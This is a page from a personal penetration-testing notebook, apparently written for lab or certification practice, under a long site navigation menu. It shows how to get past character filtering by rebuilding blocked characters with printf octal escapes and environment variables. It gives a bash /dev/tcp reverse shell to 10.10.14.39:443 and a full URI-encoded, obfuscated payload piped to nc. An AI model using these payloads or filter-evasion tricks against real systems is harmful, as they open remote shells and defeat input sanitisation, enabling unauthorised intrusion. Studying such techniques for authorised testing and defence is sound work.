refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page

Was this helpful?

  1. EXPLOITATION

Using ENV to escape Bad Characters

Characters '/ > & -' are not processed. But we want a reverse tcp one liner. We can workaround these characters using the following methods

PreviousReverse shellNextshellshock

Last updated 4 years ago

Was this helpful?

Basically our reverse shell command /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1 will not be executed successfully as / characters are being replaced. How do we get around this?

If Env contains a variable we can use. For example, the / character is being escaped during our exploitation phase to get a reverse shell. 

# Env contains a variable
OLDPWD=/
HOME=/
PHP_FCGI_MAX_REQUESTS=500
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin
LANG=en_US.ISO8859-1
PHP_FCGI_CHILDREN=1
PWD=/var/db/rrd

Looking at the above Env values We can replace '$(HOME)' with /

And format the '$LANG' variable as such IN NON-BSD:

But If the OS is BSD format so we are not able to format it like above, instead we use linux printf

We can test out we will print out a reverse shell command with replaced badcharacters

# - character
a=$(printf "\55")	

# / character
b=$(printf "\57")	

# & character
c=$(printf "\46")

# > character
d=$(printf "\76")

For this example, since the full payload will be URI encoded, the space characters will be encoded as '+'. The reverse shell payload will now be

a=$(printf+"\55");b=$(printf+"\57");c=$(printf+"\46");d=$(printf+"\76");echo+${b}bin${b}bash+${a}i+${d}${c}+${b}dev${b}tcp${b}10.10.14.39${b}443+0${d}${c}1|nc+10.10.14.39+443

Which converts successfully to the reverse shell command that was not working previously